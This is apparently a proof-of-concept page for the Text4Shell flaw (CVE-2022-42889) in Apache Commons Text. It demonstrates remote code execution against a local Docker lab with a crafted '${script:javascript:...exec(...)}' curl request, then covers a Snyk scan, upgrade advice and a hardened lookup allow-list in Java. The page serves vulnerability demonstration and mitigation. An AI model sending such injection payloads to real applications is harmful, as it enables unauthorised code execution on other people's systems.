PoC details: 7525e4359ac646d1b45bb23fd005ff4c356235f4

Source
Related vulnerability
Title: Apache Commons Text code injection vulnerability (CVE-2022-42889)
Description: Apache Commons Text is a library from the Apache Software Foundation (USA) focused on string algorithms. Apache Commons Text versions 1.5 through 1.9 contain a security flaw: the default set of Lookup instances includes interpolators that can lead to arbitrary code execution or contact with remote servers, so applications using it may be exposed to remote code execution or unintended contact with remote servers.
Description
CVE-2022-42889 (a.k.a. Text4Shell) RCE Proof of Concept
Introduction
# CVE-2022-42889 (a.k.a. Text4Shell) RCE Proof of Concept

![image](img/text4shell_small.png)

Text4Shell is the popular name of a critical software vulnerability discovered in the Apache Commons Text library (see [CVE-2022-42889](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42889)).

This repo is meant to demonstrate a **Remote Code Execution** (RCE) that leverages this CVE.

The [vulnerable code](https://github.com/sunnyvale-it/CVE-2022-42889-PoC/blob/3641b34510dfd12fe6482406b09811073c4e67d0/src/main/java/it/sunnyvale/text4shell/controller/Text4ShellController.java#L13) is used inside a Spring Boot controller, but don't be misled: this __IS NOT__ a Spring Boot/Spring security issue. The flaw is in the Commons Text library, which interpolates `${prefix:value}` expressions found in the string it is given.

Before testing the RCE, build the Docker image:

```console
$ docker build -t text4shell .
...
 => exporting to image                                                         0.0s
 => => exporting layers                                                        0.0s
 => => writing image sha256:5d82feaa030f5e7b35c1c6deaa12b40ef713c05001a41f5f71fff6174513507f  0.0s
 => => naming to docker.io/library/text4shell
```

Then run the container:

```console
$ docker run --name text4shell --rm -ti -p 8080:8080 text4shell
...
2022-11-05 09:11:03.798  INFO 1 --- [           main] it.sunnyvale.text4shell.Main             : Started Main in 1.376 seconds (JVM running for 1.713)
```

You can finally try to exploit the vulnerable application with a specially crafted URL (the `search` parameter is URL-encoded; the server echoes back the decoded string after Commons Text has interpolated it):

```console
$ curl http://localhost:8080/text4shell/attack\?search\=%24%7Bscript%3Ajavascript%3Ajava.lang.Runtime.getRuntime%28%29.exec%28%27touch%20%2Ftmp%2Fp0wned%27%29%7D
Search results for: ${script:javascript:java.lang.Runtime.getRuntime().exec('touch /tmp/p0wned')}%
```

If you find a file named **p0wned** in the container's `/tmp` directory, the RCE executed successfully.

```console
$ docker exec text4shell ls -l /tmp/p0wned
-rw-r--r--    1 root     root             0 Nov  5 09:17 /tmp/p0wned
```

Scanning the image with Snyk (`docker scan`) detects the vulnerable library and recommends the fixed version:

```console
$ docker scan text4shell | grep text
Testing text4shell...
Project name:      docker-image|text4shell
Docker image:      text4shell
Testing text4shell...
Upgrade org.apache.commons:commons-text@1.8 to org.apache.commons:commons-text@1.10.0 to fix
✗ Arbitrary Code Execution (new) [High Severity][https://security.snyk.io/vuln/SNYK-JAVA-ORGAPACHECOMMONS-3043138] in org.apache.commons:commons-text@1.8
introduced by org.apache.commons:commons-text@1.8
Upgrade org.springframework:spring-context@5.1.3.RELEASE to org.springframework:spring-context@5.2.21.RELEASE to fix
✗ Improper Handling of Case Sensitivity [Low Severity][https://security.snyk.io/vuln/SNYK-JAVA-ORGSPRINGFRAMEWORK-2689634] in org.springframework:spring-context@5.1.3.RELEASE
introduced by org.springframework:spring-context@5.1.3.RELEASE
Project name:      text4shell:latest:/app
Docker image:      text4shell
```
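The upgrade Snyk recommends is the real fix: Commons Text 1.10.0 no longer includes the `script`, `dns` and `url` lookups in the default interpolator. The following is an added example, not code from the PoC repository: it places the pattern the vulnerable controller relies on (`StringSubstitutor.createInterpolator()` fed with untrusted input) next to a hardened variant that uses an explicit allow-list of lookups, which is the right shape for code that cannot be upgraded immediately. It assumes `org.apache.commons:commons-text` 1.8 on the classpath (the version Snyk flags above); the class and method names `LookupHardening`, `vulnerableRender` and `hardenedRender` are illustrative. The probe string `${script:javascript:1+1}` is constructed and deliberately harmless: it only shows whether the script lookup is reachable.

```java
// Added example (not part of the PoC repo): vulnerable vs. hardened use of StringSubstitutor.
// Assumes org.apache.commons:commons-text 1.8 (as flagged by Snyk above); names are illustrative.
import java.util.HashMap;
import java.util.Map;

import org.apache.commons.text.StringSubstitutor;
import org.apache.commons.text.lookup.StringLookup;
import org.apache.commons.text.lookup.StringLookupFactory;

public class LookupHardening {

    /** Vulnerable pattern: the default interpolator in 1.5-1.9 enables script:, dns:, url: lookups. */
    public static String vulnerableRender(String untrustedInput) {
        return StringSubstitutor.createInterpolator().replace(untrustedInput);
    }

    /**
     * Hardened pattern: an explicit allow-list of lookups, with the default lookups NOT added
     * (third argument false) and no fallback lookup (second argument null). Any prefix that is
     * not in the map, such as "script", resolves to null and is left in the output verbatim.
     */
    public static String hardenedRender(String untrustedInput) {
        Map<String, StringLookup> allowed = new HashMap<>();
        allowed.put("sys", StringLookupFactory.INSTANCE.systemPropertyStringLookup());
        StringLookup restricted = StringLookupFactory.INSTANCE
                .interpolatorStringLookup(allowed, null, false);
        return new StringSubstitutor(restricted).replace(untrustedInput);
    }

    public static void main(String[] args) {
        // Constructed, harmless probe: evaluates to "2" only if the script lookup is active
        // AND a JavaScript engine exists on this JVM (Nashorn was removed in Java 15, in which
        // case the script lookup throws IllegalArgumentException instead of executing).
        String probe = "Search results for: ${script:javascript:1+1}";

        try {
            System.out.println("vulnerable: " + vulnerableRender(probe));
        } catch (IllegalArgumentException e) {
            System.out.println("vulnerable: script lookup reached but no engine available: " + e.getMessage());
        }

        // The hardened substitutor returns the probe unchanged, "${script:...}" included.
        System.out.println("hardened:   " + hardenedRender(probe));

        // The allow-listed lookup keeps working, so legitimate templates are unaffected.
        System.out.println("sys lookup: " + hardenedRender("${sys:java.version}"));
    }
}
```

Compile and run it with `commons-text` 1.8 (and its `commons-lang3` dependency) on the classpath; the `hardened:` line shows the `${script:...}` expression echoed back untouched, while the `vulnerable:` line either evaluates it or reports that the script lookup was reached. Restricting lookups this way is a mitigation for code that cannot be upgraded; moving to 1.10.0 or later, as Snyk suggests, removes the dangerous defaults for every `createInterpolator()` call in the application at once.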



File snapshot

```console
/data/pocs/7525e4359ac646d1b45bb23fd005ff4c356235f4
├── [ 292] Dockerfile
├── [4.0K] img
│   └── [ 23K] text4shell_small.png
├── [1.6K] pom.xml
├── [3.2K] README.md
└── [4.0K] src
    └── [4.0K] main
        └── [4.0K] java
            └── [4.0K] it
                └── [4.0K] sunnyvale
                    └── [4.0K] text4shell
                        ├── [4.0K] controller
                        │   └── [ 787] Text4ShellController.java
                        └── [ 300] Main.java

8 directories, 6 files
```